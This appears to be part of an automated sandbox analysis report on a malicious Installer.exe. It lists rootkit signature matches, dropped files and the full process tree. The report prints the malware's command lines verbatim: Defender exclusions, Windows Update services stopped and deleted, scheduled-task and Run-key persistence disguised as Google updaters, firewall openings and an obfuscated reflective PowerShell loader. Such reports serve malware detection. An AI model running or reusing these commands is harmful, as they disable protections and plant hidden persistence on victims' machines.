Source: 38.2.NtjHIfvQ.exe.1010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_sakrrobh.2st.ps1

Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe

File created: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: String function: 00F28084 appears 36 times
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Code function: String function: 00F229F0 appears 66 times
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: String function: 00007FF738DC1250 appears 107 times
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Code function: String function: 00007FF738DC2490 appears 59 times

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738D94C80 NtWriteVirtualMemory,

1_2_00007FF738D94C80

Source: 7321.tmp.1.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: Installer.exe, 00000000.00000000.321748781.0000000000D8D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameACDSeeQVUltimate15.exe.dllD vs Installer.exe
Source: Installer.exe	Binary or memory string: OriginalFilenameACDSeeQVUltimate15.exe.dllD vs Installer.exe

Source: C:\Users\user\Desktop\Installer.exe

File created: C:\Users\user\AppData\LocalLow\nss3.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@107/43@2/4

Source: C:\Users\user\Desktop\Installer.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

Code function: 1_2_00007FF738DA6EE0 GetLastError,FormatMessageA,IsDebuggerPresent,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,LocalFree,

1_2_00007FF738DA6EE0

Source: C:\Windows\System32\dialer.exe

Code function: 55_2_00007FF6CF741000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,lstrcatW,lstrcatW,

55_2_00007FF6CF741000

Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: Installer.exe	ReversingLabs: Detection: 73%
Source: Installer.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Installer.exe C:\Users\user\Desktop\Installer.exe
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe "C:\Users\user\AppData\LocalLow\1u8JL0XE.exe"
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe"
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: unknown	Process created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe"
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\MfU3390p.exe "C:\Users\user\AppData\LocalLow\MfU3390p.exe"
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Source: unknown	Process created: C:\Users\user\AppData\LocalLow\MfU3390p.exe C:\Users\user\AppData\LocalLow\MfU3390p.exe
Source: unknown	Process created: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe
Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe	Process created: C:\Windows\System32\audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{946476e5-3894-42c2-b536-7341f926cc1f}
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe "C:\Users\user\AppData\LocalLow\1u8JL0XE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\AppData\LocalLow\MfU3390p.exe "C:\Users\user\AppData\LocalLow\MfU3390p.exe"	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\1u8JL0XE.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\OBH7JYJN.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\LocalLow\OBH7JYJN.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f	Jump to behavior
